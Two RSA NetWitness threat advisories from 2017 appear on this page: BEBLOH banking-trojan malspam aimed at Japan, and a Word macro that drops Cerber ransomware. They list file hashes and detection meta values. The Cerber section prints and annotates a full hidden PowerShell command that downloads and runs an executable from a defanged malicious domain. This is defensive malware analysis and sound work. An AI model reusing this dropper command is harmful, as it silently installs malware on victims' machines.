Skip navigation
All Places > Products > RSA NetWitness Platform > Blog > 2017 > July > 21

Malspam activity was noted on July 20 2017 delivering BEBLOH banking trojan. BEBLOH has been around since 2009 and has the ability to steal money from unsuspecting victims right off their bank accounts [1]. Based on the noticed delivery documents it seems this campaign is targeting users in Japan. 

 

Scan results of a delivery document can be found here. Here is a screenshot taken of the malicious spreadsheet:

 

 

Submitting the spreadsheet to RSA's pre-release What's This File service shows maximum threat score:

 

 

What's This File service also shows the embedded VBA code:

 

 

Here is the host behavior upon opening the delivery document on a machine with RSA NetWitness Endpoint agent installed:

 

 

Obfuscated powershell code is used to download an executable to a local directory. The screenshot below shows the download activity in RSA NetWitness:

 

 

 

VirusTotal scan results of the download executable suggest it is a BEBLOH variant. The EXE is saved to the user Documents folder as %appdata%.exe

 

 

Here is the process tree:

 

 

The download sessions are tagged with different meta values in RSA NetWitness including http two headers, http no referer, http no user-agenthttp get no post under Service Analysis and exe filetype under File Analysis

 

 

BEBLOH delivery documents (SHA256):

  • fc0d7e53b0d55232a4a89614841ec77f022aab845a08dd4cbc47d3d6d35fc641
  • d82f57b4ab676ae02c710becedf9a0883f935fee89abf98c010c1a8b122b7140
  • 87d3eb0c512568c3cbe931670680b77d3f039312279f6817542dc612619d6449

 

BEBLOH Trojan (SHA256):

  • 29c7740f487a461a96fad1c8db3921ccca8cc3e7548d44016da64cf402a475ad

 

All the IOC from those HTTP sessions were added to FirstWatch Command and Control Domains feed on Live with the following meta values:

  • threadt.source = 'rsa-firstwatch'
  • threat.category = 'malspam'
  • threat.description = 'delivery-domain'

 

References:

  1. TrendLabs Security Intelligence BlogBEBLOH Expands to Japan in Latest Spam Attack - TrendLabs Security Intelligence Blog 

During the early weeks of July, malspam activity delivered a malicious word document, which uses macros to download and execute a Cerber ransomware payload. This is not a new exploitation vector. Macros are often abused to perform malicious tasks, like downloading and dropping malware. Victims can easily be tricked into running the malicious macro.

 

 

Submitting the delivery document to What's This File service shows more information about the malicious word document.

 

 

This activity and more is also captured in the process tree below shows the series of events that led to downloading and executing a Cerber payload:

 

 

The macro in our MS Word Document calls PowerShell to connect to the malware’s distribution website to download and run an executable:

 

powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://dastonond[.]top/admin.php?f=1.jpg'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

 

Line-By-Line analysis of PowerShell Command:

powershell.exe

  • First line of the command opens the PowerShell application from the Windows System32 directory

-WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;

  • Opens PowerShell as a hidden window so it is not visible to the victim.
  • The variable “$wscript” is created and assigned to the created WScript.Shell instance. 
  • WScript.Shell provides access to the OS shell methods,which substantially increase the capabilities and the types of applications that PowerShell can interact with.

$webclient = new-object System.Net.WebClient;

  • The variable $webclient is created and is given a System.Net.WebClient instance. 
  • The WebClient class provides a list of methods that allow the instantiated object to send and receive data from web servers identified by a URL.

$random = new-object random;

  • This command simply creates a new instance of a random object ($random).

$urls = ‘http://dastonond[.]top/admin.php?f=1.jpg'.Split(',')

  • The $urls variable is assigned to a malicious binary hosted on a malicious domain. 
  • This variable is also capable of stringing together multiple binaries hosted on different domains by simply separating the different URLs with commas. 

$name = $random.next(1, 65536);

  • The $name variable is assigned a random number from the $random variable between 1 and 65536.

$path = $env:temp + ‘\’ + $name + ‘.exe’;

  • The $path variable is set to the Windows environment variable directory which points to the user’s AppData temp folder. 

foreach($url in $urls){try{

  • The script iterates through each URL given in the $urls variable and runs the subsequent commands on it.

$webclient.DownloadFile($url.ToString(), $path);

  • The $webclient variable is used to download a file from the website in the $urls variable to the path specified in the $path variable. 

Start-Process $path;}break;}

  • Executing downloaded fine and if the command failed to return a process and continued silently, the window remains hidden and the process breaks.

catch{write-host $_.Exception.Message;}

  • This is another mechanism to keep the script running silently in the background.

 

In our case, it downloads a JPG file. Well, it is actually a PE file saved to C:\Users\<user>\AppData\Local\Temp\5356.exe". It runs and starts to spawn a number of processes to gather information and to encrypt files on the infected system.   

 

 

VirusTotal analysis of the dropped file confirm it’s Cerber Ransomware:

 

 

Once the ransomware has successfully installed, post-infection traffic shows typical Cerber beaconing UDP spray out to 77.12.57/24 on port number 6893.

 

 

Current NetWitness detection flags both payment domain (key.dga.tld pattern) as 'cerber ransomware' and the UDP spray as 'cerber beacon' in the <Indicators of Compromise> meta field. 

 

 

Additionally, <File Analysis> flags for 'js eval no docwrite' and 'exe filetype but not exe extension' should be noted as indicators of possibly malicious files.

 

 

All the IOCs are added to the following feeds on Live:

  • RSA FirstWatch Command and Control Domains
  • RSA FirstWatch Command and Control IPs

For more information on Cerber ransomware, its evolution and detection techniques using RSA NetWitness, Please check the following RSA Link articles:

 

 

Thanks go to Ahmed Sonbol and Kevin Stear for contributing to this threat advisory.

 

 

References:

 

Filter Blog

By date: By tag: